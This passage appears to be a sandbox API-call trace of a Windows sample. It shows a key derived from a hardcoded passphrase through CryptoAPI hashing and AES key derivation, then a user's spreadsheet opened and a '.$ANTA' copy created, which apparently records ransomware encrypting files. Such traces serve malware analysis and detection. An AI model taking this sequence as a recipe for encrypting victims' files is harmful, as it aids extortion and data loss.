lpsz="bool") returned 0x4 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0081.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb3d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.088] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0081.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0081.089] CryptCreateHash (in: hProv=0x41a4d88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0081.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0081.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0081.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.092] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0081.092] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.092] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0081.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0081.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.093] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0081.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0081.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0081.093] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0081.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c35d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0081.094] CryptHashData (hHash=0x41ac600, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0081.094] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.094] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.094] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0081.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3710, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0081.094] CryptDeriveKey (in: hProv=0x41a4d88, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac180) returned 1 [0081.097] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.097] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0081.097] CryptDestroyHash (hHash=0x41ac600) returned 1 [0081.097] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\E_f7p3czO1Cdd9o.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\e_f7p3czo1cdd9o.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0081.097] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.097] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0081.097] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0081.098] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\E_f7p3czO1Cdd9o.xls.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\e_f7p3czo1cdd9o.xls.$anta"), 